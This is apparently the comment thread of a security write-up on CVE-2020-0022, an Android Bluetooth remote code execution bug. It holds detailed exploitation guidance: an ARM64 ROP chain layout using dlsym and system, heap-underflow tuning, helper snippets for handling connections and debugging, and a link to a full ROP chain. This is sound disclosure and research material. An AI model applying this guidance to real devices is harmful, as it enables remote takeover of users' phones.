This bug was initially sent to the Android Security Team on November 3, 2019, including a PoC. It was fixed on February 1, 2020, and acknowledged by the Android Security Team. I would like to thank the team for coordinating the process and providing a fix. I would also like to thank Jiska Classen and Fabian Beterke for their assistance. Additionally, we want to give a shout-out to Swing’Blog and Marcin Kozlowski, who were, to our knowledge, the first to reverse the key idea of the vulnerability.
Scripts for testing can be downloaded here. The ROP chain has been removed from the exploit. The archive contains the following files:
- python2 simple_crash.py target PoC for crashing the remote device
- python2 simple_leak.py target PoC for the section “Unexpected leak”
- python2 fancy_leak.py target PoC for the section “Leaking More Data”
- python2 memcpy.py libc.so memcpy Unicorn emulation of memcpy for section “memwtf(,,-2);”
- python2 exploit.py target remote_libicuuc.so exploit excluding ROP chain
Also lots of thanks to Polo35, who provided a PoC working on 32bit using a different exploit strategy. For further details check out his repo.
use my mask to exchange ROP 😂
Sorry, we can’t accept that. We need toilet paper!
Not that important, but I reversed the idea behind the vulnerability on 12th Feb 2020. Swing’s post is dated to 16th Feb 2020. Here is my post, as a proof: https://seclists.org/fulldisclosure/2020/Feb/10 Could not crash the process outside GDB and many other unknowns at that time. Also we exchanged some communication with Swing in that time periods. Great guy as you as well. More info also in my Repo, maybe you will find it useful: https://github.com/marcinguy/CVE-2020-0022
Sorry, I forgot. We have checked your repo quite often and found Swing that way (I’ve updated the post).
The problem is that a crash is an edge case, at least for ARM64. If you randomly corrupt data on the heap, crashes are non-reproducible. For the memcpy to crash, the lower nibble of the address has to be 0 or 1 for a length of -2. Therefore the chances are also quite low if you do not change the packet length. That was also the reason why we do not provide a crash-only PoC. By messing around and looking at the responses, you can see that something is going on. We tried not to point people to the memcpy implementation, but without any luck.
I guess, your commit history is a good example, why quarterly updates are not a good idea in general.
I’m suryanarayanan from India I want to know how to fast boot Redmi note 4 and my android version is not at all upgraded only Miui version updated and patch update not updated 2018 patch version is still running on my mobile how to update it and all apps are running in wifi notification don’t disturb mode
Hi Suryanarayanan,
I do not own a Redmi Note 4 myself, but to enter fastboot Power + Vol Down should work [1]. If you are running a MIUI Os, can you tell us the version number and the Security patch level? You could try to upgrade to Miui v11. It seems to be the latest, still supported version and should support Android 10, which is not vulnerable for RCE.
best greets to India,
Jan
[1] https://www.hardreset.info/devices/xiaomi/xiaomi-redmi-note-4-64gb/fastboot-mode/
I’m using a pixel 2 XL, Android 9 with August 1 2019 security patch and I keep getting a connection reset when i run exploit.py. Logs are indicating “bt_btm_sec: btm_sec_disconnected clearing pending flag handle:9 reason:22”. Have you encountered such issues before?
Hi,
Nexus and Pixel devices seem to always respond with an empty L2CAP Echo Response. Therefore this leak technique does not work on those devices. Eventually, this can be solved differently, but we have not evaluated the possibility. The overflow of the signal object without CFI should behave the same. To validate the presence of the bug, I’ve added a script simple_crash.py to the archive above.
Best, Jan
Hi Jan,
Thank you for your reply. In my case, my Pixel phone is responding with a non-empty L2CAP Echo Response. fancy_leak.py actually works, I see portions of my phone’s memory in the response packets, just that after a while the same “reason:22” causes the connection to be broken. Does your Pixel phones behave the same way?
A quick research shows that “reason:22” means “the host terminates the link itself”, which in this case is the Android device terminating the link. I’m trying to find out why is this the case but apparently I’m out of ideas on what to try.
BTW, I tried this on a Huawei Mate 9 and the same behavior appears.
Hi Jack,
Interesting to know, that your pixel responds to L2CAP echo requests, no idea why some devices behave differently.
If you see the leaked data you are golden. We have also encountered the phone is closing the connection if you send garbage for too long. It is no problem as you can reconnect if the remote side closes the connection. It is also helpful, as it mixes up the heap a bit.
Cheers, Jan
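The reconnect-on-drop behavior described above can be sketched as a small retry loop. This is only an illustration in Python 3 (the PoC scripts themselves are Python 2): `connect` and `work` are hypothetical callables standing in for whatever your script uses to open the connection and exchange echo packets, and the retry count and delay are arbitrary.

```python
import time


def run_with_reconnect(connect, work, max_attempts=5, delay=1.0):
    """Call work(conn), reconnecting whenever the remote side drops the link.

    connect and work are hypothetical callables supplied by the caller.
    """
    last_error = None
    for _ in range(max_attempts):
        conn = connect()
        try:
            return work(conn)
        except ConnectionError as err:  # includes ConnectionResetError
            last_error = err
            time.sleep(delay)  # give the remote stack time to recover
        finally:
            # Close the connection if the object offers a close() method.
            close = getattr(conn, "close", None)
            if close is not None:
                close()
    raise RuntimeError("gave up after %d attempts" % max_attempts) from last_error
```

Keep in mind that the connection handle may differ after every reconnect, so anything derived from it has to be refreshed inside `work`.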
Hi,
I am trying to reproduce the described memory leak on my LeEco 2 with DotOS (Android 8) using the fancy_leak.py script, but I ran into a problem. I can call do_leak() only once, because the next time the script calls it, it doesn’t receive an echo response from the smartphone. Can you advise why this happens?
Thanks, Tracy.
Hmm, this sounds as if the remote side crashes. Do you see anything interesting in logcat (e.g. logcat | grep $(pgrep droid.bluetooth))? If it does crash, there are two possible reasons:
1) The memory layout is slightly different, so an edge case is triggered where memcpy crashes or some other data gets corrupted.
2) memcpy is not vulnerable. Can you provide the libc.so? You can use the memcpy.py script to test the libc. If the script crashes with a Memory Unmapped error, the implementation is most likely not vulnerable. This is the case for Android 10, as they wrap memcpy with memmove.
Did you have any success with simple_leak.py? It does the same as do_leak but does not try to overwrite the packet in memory, so it is more stable.
Edit: Fixed wrong logcat grep cmd.
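To check a saved logcat dump for a crash of the Bluetooth process, a filter along these lines may help. It is a rough sketch that assumes the usual "Fatal signal ..." line printed by Android's libc on a native crash; the function name and the default process name are illustrative choices.

```python
import re

# Matches lines such as:
#   F libc : Fatal signal 6 (SIGABRT), code -6 (SI_TKILL) in tid 1 (x), pid 1 (y)
FATAL_RE = re.compile(
    r"Fatal signal (?P<signo>\d+) \((?P<signame>\w+)\).*"
    r"pid (?P<pid>\d+) \((?P<process>[^)]+)\)"
)


def find_fatal_signals(logcat_text, process="droid.bluetooth"):
    """Return (signal name, pid) for each fatal-signal line of the given process."""
    hits = []
    for line in logcat_text.splitlines():
        match = FATAL_RE.search(line)
        if match and match.group("process") == process:
            hits.append((match.group("signame"), int(match.group("pid"))))
    return hits
```

An empty result after sending packets suggests that the daemon did not crash, or that the dump was taken from the wrong device or time window.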
Thank you for your reply. First of all, memcpy on my device must be vulnerable for two reasons: first, my device is running under Android 8 with CVEs from summer 2018, and second, I examined the memcpy function using IDA Pro and found the same bugs as you described. So this shouldn’t affect the whole process.
But thanks to your advice, I looked through the Bluetooth logs and found out that my device can’t reconnect to the PC after the Bluetooth daemon crashes until the HCI socket on my PC is reloaded. (I am new to Bluetooth logs, so correct me if I’m wrong. Bluetooth log: https://gist.github.com/Roo4L/eefd626bb62ad34a6976cccce8c878c2)
Have you faced the same issue? I guess it’s very easy to fix by modifying your scripts. I will try this right now, but I want to find the root of this problem. Do you have any ideas?
P.S.: I said that it is very easy to fix, but then realized that the connection handle can change after a reload, which affects the fancy_leak.py script. Is that right?
What you said is correct: the connection handle can change upon reconnect. The local handle should be extracted from the HCI connection response. The remote handle is important later in fancy_leak.py, as it will be overwritten during the memory corruption and therefore must be set correctly. Otherwise, your leaked data will end up in an invalid or a different connection. However, do_leak is the function that should leak the remote handle. It is odd that this function only works once. It would be good to know if simple_leak.py works, which is essentially a wrapper for this function.
Sending L2CAP traffic using HCI sockets can indeed sometimes cause nasty errors, so restarting BlueZ and the controller can help. My laptop has a switch to disable the controller in hardware, and I used it quite often when something was not working. You can also use a regular l2ping to check if your setup is operational.
From your logs, it looks as if there might be some other Bluetooth traffic (maybe HID?) going on in the background. If both devices are not paired, the attack might become easier, as there are fewer side effects.
Sorry, that I did not bother to clean up the code… (:
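Extracting the local handle from the HCI connection response, as mentioned above, could look roughly like this in Python 3. The sketch assumes an H4-framed packet read from a raw HCI socket and the standard Connection Complete event layout (event code 0x03, status byte, then a little-endian handle); the function name is made up for this example.

```python
import struct

HCI_EVENT_PKT = 0x04      # H4 packet indicator for HCI events
EVT_CONN_COMPLETE = 0x03  # Connection Complete event code


def parse_conn_complete(pkt):
    """Return the connection handle from a Connection Complete event, else None."""
    if len(pkt) < 6 or pkt[0] != HCI_EVENT_PKT or pkt[1] != EVT_CONN_COMPLETE:
        return None
    status = pkt[3]
    if status != 0x00:    # a non-zero status means the connection attempt failed
        return None
    (handle,) = struct.unpack_from("<H", pkt, 4)
    return handle & 0x0FFF  # the handle occupies the low 12 bits
```

Because the handle can change on every reconnect, this has to be re-run for each new connection instead of caching the first value.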
Hi,
I was trying to run simple_crash.py against a Nexus 5X and a Google Pixel with Android 8.1.0 (unpatched), but I didn’t see any crash on the target devices. Could you give me a clue? Thanks!
Did you have a look on the device with adb shell “logcat | grep -i fatal”?
Otherwise, you might want to check in Wireshark whether L2CAP echo requests are actually sent to the target device. If you are not using hci0, you also need to adapt the bind command.
Yes, I used “logcat | grep -i fatal” to check for the crash. The L2CAP echo requests look fine in Wireshark. My test machine is a Kali Linux VM on a MacBook Pro 16; in Kali I ran the command “hciconfig hci up”. I didn’t see any log like “bt_hci_packet_fragmenter: reassemble_and_dispatch …” through adb shell logcat, so it seems it failed to hit the patched condition. Do I need to switch to another host machine to test, like a Windows host?
Uff, that sounds weird. I was using a native Arch Linux; Windows will probably not work. Can you run a normal l2ping inside your Kali VM against your device? Do you see any response to the echo requests emitted by simple_crash.py in Wireshark? Have you also tried logcat | grep $(pgrep droid.bluetooth)?
Every L2CAP packet is processed by the reassemble_and_dispatch function. So as soon as the first packet arrives correctly, you should see some error message from this function, unless you send a 2-byte continuation packet every time.
Otherwise, a pcap would be great to debug the problem.
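When looking at captured traffic, it can help to decode the ACL and L2CAP headers of each packet to see whether start and continuation fragments arrive as intended. The following Python 3 decoder is only a sketch for inspecting captures: it assumes H4 framing (first byte 0x02 for ACL data) and the standard header layout, and the names `AclFragment` and `decode_acl` are invented for this example.

```python
import struct
from collections import namedtuple

AclFragment = namedtuple("AclFragment", "handle pb_flag acl_len l2cap_len cid")

PB_CONTINUATION = 0b01  # packet boundary flag of a continuing fragment


def decode_acl(pkt):
    """Decode an H4-framed HCI ACL packet (first byte 0x02).

    l2cap_len and cid only exist in a starting fragment, so they are None
    for continuation fragments.
    """
    if len(pkt) < 5 or pkt[0] != 0x02:
        raise ValueError("not an HCI ACL data packet")
    handle_flags, acl_len = struct.unpack_from("<HH", pkt, 1)
    handle = handle_flags & 0x0FFF        # low 12 bits: connection handle
    pb_flag = (handle_flags >> 12) & 0x3  # next 2 bits: packet boundary flag
    l2cap_len = cid = None
    if pb_flag != PB_CONTINUATION and len(pkt) >= 9:
        l2cap_len, cid = struct.unpack_from("<HH", pkt, 5)
    return AclFragment(handle, pb_flag, acl_len, l2cap_len, cid)
```

Comparing `acl_len` of each fragment with the `l2cap_len` announced in the starting fragment shows how many bytes the reassembly still expects.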
great work!
About the ROP chain: where did you find ‘u_cleanup_60’? Can you describe it in more detail?
All the required gadgets are within libicuuc.so. The problem is that the offset between the libraries is not deterministic across reboots. Therefore we are stuck with that library, as it was the only one whose base address we could reliably determine. This is also why we need dlsym to get the address of system; otherwise, it would be easier.
On some builds, this function might not be exported as a symbol. If you search for functions with the prefix u_cleanup and go from there, you should find it.
Yes, thanks, I found a function “u_clean_up_58” like you described (the phone is a Nexus 6P, version 8.1.0, kernel version 3.10.73), but the opcodes are:
LDR X8, [X19,#(qword_1AC100 - 0x1AC0C0)]
CBZ X8, loc_75DA0
BLR X8
STR XZR, [X19,#(qword_1AC100 - 0x1AC0C0)]
loc_75DA0 ; CODE XREF: sub_75CF8+9C↑j
LDR X8, [X19,#(qword_1AC108 - 0x1AC0C0)]
CBZ X8, loc_75DB0
BLR X8
STR XZR, [X19,#(qword_1AC108 - 0x1AC0C0)]
loc_75DB0 ; CODE XREF: sub_75CF8+AC↑j
LDR X8, [X19,#(qword_1AC110 - 0x1AC0C0)]
CBZ X8, loc_75DC0
BLR X8
STR XZR, [X19,#(qword_1AC110 - 0x1AC0C0)]
This is different from the “u_clean_up_60” description. Can the exploit still continue with it?
Another question: do you need to calculate the address of dlsym? And based on the function u_clean_up, how do you build a ROP chain that can pass arguments to dlsym and the system call? Please give as much information as possible, thank you very much!
Great, that looks correct! Yes, you can still use that function; the registers are the same. The key is that you can call an arbitrary function, return in a controlled manner, and then call your next gadget. In addition, you can now also use gadgets that end with a return. This gives you much more flexibility in building your ROP chain. So what you do is something like this:
# set X19 to point into your buffer
x19+a = set_x1_to_string_system_ret
x19+b = set_x0_to_NULL_ret
x19+c = dlsym
x19+d = save_x0_to_register_ret
x19+e = set_x0_to_shell_cmd_ret
x19+f = call_saved_system_ptr
dlsym is imported by almost every library, therefore you will find a jump to that function in the relocation table. The address of this gadget can be computed from the base address of the library if you know the remote running version.
Yeah, I understand your method: it uses the function “u_clean_up” to control the execution flow, and the X19 pointer simulates the stack. This is an excellent idea! But how can I set X19 to point to my buffer? Where does it point when the story begins? :)
Short answer: you can use C++ object calls for that
Long answer: Added to the post above for better readability. Starting at:
“To set x19, lets first recap the preconditions”
Good question!
Hello, I am trying to replicate this on my Oppo 5, but I am not sure if I have the right file. Is it different for different devices? Note: for security reasons, I modified the MAC address below for this post.
kali@kali:~/Downloads/cve_2020_0022_export$ sudo python2 exploit.py C4:FF:00:CA:00:48 libs/libicuuc.so
Not connected.
loading libs/libicuuc.so
Lost connection
Connecting
Traceback (most recent call last):
  File "exploit.py", line 266, in <module>
    libicuuc_symbols = load_symbols(sys.argv[2])
  File "exploit.py", line 234, in load_symbols
    fd = open(fname, "rb")
IOError: [Errno 2] No such file or directory: 'libs/libicuuc.so'
Hi
The libicuuc.so needs to be copied from your target device. It is required because our PoC automatically searches it for the offsets of the gadgets used for ROP, as well as the offset between the functions used to determine the library base address.
In theory, you might be able to fingerprint the remote library version using the leak and find gadgets that are not device-dependent. Cross-device compatibility is something we have not evaluated.
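The IOError in the traceback above simply means the library file is not there yet. A small pre-flight check like the following (Python 3, illustrative only) can catch that before any connection is attempted. The 64-bit check is an assumption based on the ARM64 targets discussed in the post, and `check_library` is a made-up helper name.

```python
import os


def check_library(path):
    """Return None if path looks like a 64-bit ELF file, else an error string."""
    if not os.path.isfile(path):
        return "missing: %s (copy it from the target device first)" % path
    with open(path, "rb") as fd:
        ident = fd.read(5)
    if ident[:4] != b"\x7fELF":
        return "not an ELF file: %s" % path
    if ident[4:5] != b"\x02":  # EI_CLASS byte: 1 = 32-bit, 2 = 64-bit
        return "not a 64-bit ELF: %s" % path
    return None
```

On many Android 9 builds the library can probably be pulled with adb from /system/lib64, but that path is an assumption and may differ per device.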
It seems like I can’t find a suitable gadget to save x0 after the dlsym call when I’m already inside the cleanup function. The only gadget that can save x0 uses x8, and x8 gets overwritten after the ret, so it’s pretty useless.
We had the same problem, but as you are almost done, just a hint: close enough is sometimes sufficient.
Good luck ! 😉
Hi Jan!
I tested simple_crash.py, simple_leak.py and fancy_leak.py on 4 phones (Nexus 6P, Galaxy S8, ..), and none of them crashed or leaked any information. I checked the code:
if ord(pkt[0]) == 0x04 and ord(pkt[1]) == 0x03:
    if handle == 0:
        handle = struct.unpack("<H", pkt[4:6])[0]
        print "Got connection handle", handle
It looks like the script never gets the handle because the 0403 packets are not received. I then used https://github.com/leommxj/cve-2020-0022, and this PoC crashes all 4 phones. It gets the handle by calling getsockopt on the L2CAP socket. Is there a difference between these two handles? And are there other ways to get the handle in a Python environment?
Hi,
Thanks for the link. The code looks much cleaner than ours 😀
Using getsockopt sounds like the proper way of determining the connection handle, and if it works for you, the call seems to be correct. This is a Linux system call [1], and there is a wrapper for it in Python [2].
In the code you mentioned, I manually parse the connection handle from the HCI response. This was a quick and dirty method. It also requires raw HCI sockets, which do not seem to be the most reliable option on some systems. If you want to verify the correctness of the handle, you could look at the HCI traffic in Wireshark and compare.
[1] https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
[2] https://kite.com/python/docs/socket.socket.getsockopt
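The getsockopt approach discussed above can be sketched in Python 3 as follows. The numeric constants are taken from the Linux/BlueZ headers as far as I recall them (SOL_L2CAP = 6, L2CAP_CONNINFO = 0x02), so treat them as assumptions and verify them against your system headers; `l2cap_handle` is a hypothetical helper name.

```python
import struct

# Assumed values from the Linux/BlueZ headers (bluetooth.h, l2cap.h).
# They are hard-coded because Python's socket module may not export them.
SOL_L2CAP = 6
L2CAP_CONNINFO = 0x02


def l2cap_handle(sock):
    """Return the HCI connection handle of a connected L2CAP socket."""
    # Kernel layout: struct l2cap_conninfo { __u16 hci_handle; __u8 dev_class[3]; }
    raw = sock.getsockopt(SOL_L2CAP, L2CAP_CONNINFO, 8)
    (handle,) = struct.unpack_from("=H", raw)  # native byte order, no padding
    return handle
```

Here `sock` is expected to be an already connected socket of family AF_BLUETOOTH using the L2CAP protocol. The returned value can then be compared with the handle shown in Wireshark.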
Hi Jan,
I am trying fancy_leak (Nexus 6P, 8.0.1). It can leak the remote handle and the heap spray succeeds, but it can’t leak the address of libicuuc.so. I noticed this code:
verify_len = 48
…
send_echo_hci(ident+1, "A"*46, l2cap_len_adj=2)
Then I tested simple_leak with "A"*46 and got the same result.
My question: is there a relationship between 48 and 46?
Where and how can I adjust this to make it work?
Hi,
and here again, sorry for the late response, but this is also not a trivial question. First of all, what we try to do here is to place our input in front of the source buffer. That way we control the underflow, which is used to overwrite the packet headers to increase the leak. To detect whether we have placed our data correctly, we compare ‘verify_len’ bytes of the leaked data with the expected data. So this length is somewhat arbitrary.
The other length (48) you mentioned is the length of the packet that will be corrupted, including the packet headers. This length has to be short enough to reach the HCI, ACL and L2CAP headers, but must not modify the BT_HDR. The 48 bytes were tuned so that the underflow ends at the BT_HDR. The length stored in the BT_HDR has to be correct to exit the reassembly logic and pass the packet to L2CAP. If we also increased this length, the reassembly logic would continue to receive packets until the corrupted length stored in the BT_HDR is reached. (In hindsight, this might also be usable to extend the overflow and control even more data on the heap.)
Hopefully, I have not missed a constraint.
If you have trouble, you could go through the same process of analyzing the memory in the different stages of the exploit. Use patterns that are easily recognizable in memory and see how the target behaves.
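One way to get easily recognizable patterns is a buffer of unique 4-byte chunks, so that any piece showing up in leaked data tells you which part of your input it came from. The Python 3 sketch below is a generic debugging aid, not part of the original scripts; the chunk format and both function names are arbitrary choices.

```python
import struct


def make_pattern(length):
    """Build a buffer of unique 4-byte chunks: b'P' followed by a 24-bit counter."""
    chunks = (b"P" + struct.pack(">I", i)[1:] for i in range((length + 3) // 4))
    return b"".join(chunks)[:length]


def locate(pattern, leaked, min_len=8):
    """Return (offset in leak, offset in pattern) of the first min_len-byte match."""
    for start in range(0, len(leaked) - min_len + 1):
        pos = pattern.find(leaked[start:start + min_len])
        if pos != -1:
            return start, pos
    return None
```

The second offset shows which part of the sent data ended up in the leak, which helps when tuning lengths for a different device.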
A great article. Thanks for sharing.
Hello,
The lockdown gave me the time to play with this vulnerability on my Bbox Android TV STB, thanks to your really great article.
I managed to call system 🙂
I had to find another leak method, because the box is built on a Cortex-A9, which is ARM32, and its memcpy does not corrupt at -64 bytes the way it does on ARM64.
But the vulnerability is present and exploitable in a different way.
By sending L2CAP packets with 4-byte fragmentation, we can trigger a memcpy of length 0 in reassemble_and_dispatch.
This yields 4 bytes of uninitialized data at the end of the echo.
Increasing the length of the first packet lets us “walk” the uninitialized memory.
Getting 32 echoes with the same first packet length gives 2 to 8 exploitable memory leaks.
The echoes repeat, so there is no need to get more than 32 echoes with the same first packet length.
This method also fills the memory with the sent packets, so it’s easy to recognize patterns and find offsets in the leaks.
You can check my GitHub repository with the full ROP chain 😉 here:
https://github.com/Polo35/CVE-2020-0022
Thank you very much for sharing all of this.
Best regards
Thank you. Read the article.
Thanks for sharing this nice article.
A nice article. Thanks for sharing.
A great article. Thanks for sharing!
Hi Jan,
I’m trying exploit.py with a Nokia 2.2 (Android 9). I can see the message “Heap spray successfull”, but Bluetooth crashed.
I checked logcat and it says:
03-21 08:25:32.910 19515 19554 I app_process64: system/bt/main/bte_main.cc:113:3: runtime error: control flow integrity check for type 'base::TaskRunner' failed during non-virtual call (vtable address 0x5959595959595959)
03-21 08:25:32.910 19515 19554 I app_process64:
03-21 08:25:33.010 19515 19554 I app_process64: 0x5959595959595959: note: invalid vtable
03-21 08:25:33.010 19515 19554 I app_process64:
03-21 08:25:33.010 19515 19554 I app_process64:
03-21 08:25:33.010 19515 19554 I app_process64:
03-21 08:25:33.011 19515 19554 F libc : Fatal signal 6 (SIGABRT), code -6 (SI_TKILL) in tid 19554 (HwBinder:19515_), pid 19515 (droid.bluetooth)
03-21 08:25:33.144 19639 19639 I crash_dump64: performing dump of process 19515 (target tid = 19554)
03-21 08:25:33.172 19639 19639 F DEBUG : pid: 19515, tid: 19554, name: HwBinder:19515_ >>> com.android.bluetooth <<<
03-21 08:25:33.798 868 19644 D AES : ExceptionLog: notify aed, process:com.android.bluetooth pid:19515 cause:system_app_native_crash
03-21 08:25:33.845 868 3504 I ActivityManager: Process com.android.bluetooth (pid 19515) has died: psvc PER
03-21 08:25:33.846 868 954 W libprocessgroup: kill(-19515, 9) failed: No such process
03-21 08:25:33.847 868 954 I libprocessgroup: Successfully killed process cgroup uid 1002 pid 19515 in 0ms
Any advice?
Thank you!
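A quick way to read such a log is to decode the reported vtable address as bytes. The Python 3 helper below is a sketch that only assumes the "vtable address 0x..." wording shown in the log above; the function name is made up.

```python
import re
import struct


def decode_vtable_pattern(log_line):
    """Return the reported vtable address as 8 raw bytes, or None if absent."""
    match = re.search(r"vtable address 0x([0-9a-fA-F]{1,16})", log_line)
    if match is None:
        return None
    return struct.pack("<Q", int(match.group(1), 16))
```

For the line above this gives eight bytes of 0x59, which is ASCII "Y". If the sprayed data contains runs of "Y", this would suggest that the object was overwritten with sprayed data and that the CFI check mentioned earlier in this thread aborted the call. That reading is an assumption and should be checked against the payload actually sent.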